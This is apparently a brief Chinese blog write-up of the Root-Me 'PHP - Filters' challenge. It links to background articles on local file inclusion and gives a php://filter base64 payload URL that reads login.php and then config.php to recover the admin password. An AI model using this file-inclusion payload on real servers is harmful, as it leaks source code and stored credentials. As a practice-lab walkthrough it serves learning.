PHP - Filters

Retrieve the administrator password of this application.

 

对文件包含的介绍------------第一个链接需要谷歌

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

 

此处使用php://filter伪协议:

payload:

  http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php

读取到login.php的内容后base64解密:

PHP - Filters

 

 再根据php代码,读取config.php的文件内容:

  PHP - Filters

上一篇:vmware12共享windows的文件给虚拟的linux


下一篇:Filters in ASP.NET Core